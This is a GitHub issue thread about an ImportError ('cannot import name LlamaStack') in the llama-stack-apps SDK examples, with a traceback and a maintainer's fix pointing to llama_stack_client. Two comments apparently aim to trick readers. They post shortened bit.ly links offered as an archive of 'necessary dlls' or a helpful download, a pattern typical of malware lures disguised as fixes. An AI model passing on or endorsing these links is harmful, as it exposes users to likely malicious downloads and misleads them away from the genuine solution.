### ISSUE TITLE
Unable to import: from llama_stack import LlamaStack

### ISSUE THREAD

**Issue by cheesecake100201** [meta-llama/llama-stack-apps#76]
Path to file: /llama-stack-apps/sdk_examples/agents/client.py
Line 11
from llama_stack import LlamaStack

Steps to recreate:
1) Created a conda venv with python3.10
2) pip install -r requirements.txt
3) Ran the llama-stack server on port 8081(For starting the server check out the llama stack repo)
4) python -m sdk_examples.agents.client localhost 8081

The following error is given after the above command
```
Traceback (most recent call last):
  File "/usr/local/Caskroom/miniconda/base/envs/llama-stack/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/local/Caskroom/miniconda/base/envs/llama-stack/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/Users/sarthakdeshpande/engati/llama-stack-apps/sdk_examples/agents/client.py", line 11, in <module>
    from llama_stack import LlamaStack
ImportError: cannot import name 'LlamaStack' from 'llama_stack' (/usr/local/Caskroom/miniconda/base/envs/llama-stack/lib/python3.10/site-packages/llama_stack/__init__.py)
```

<img width="1792" alt="Screenshot 2024-09-19 at 5 09 02 PM" src="https://github.com/user-attachments/assets/d3d32c63-f427-45b5-8a6b-09712e91fce8">

**Comment by Ahmed-khalil3** [comment]
download
https://bit.ly/4gwC82r
I put the necessary dlls in the archive

**Comment by Arturron** [comment]
maybe this will help
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by yanxi0830** [comment]
Thanks for raising the issue! We have recently made major changes to the scripts and client SDK in our repo. Could you try `git pull` and `pip install -r requirements.txt` again to run the updated scripts. 

You should see `from llama_stack_client import LlamaStackClient` in the demo scripts.
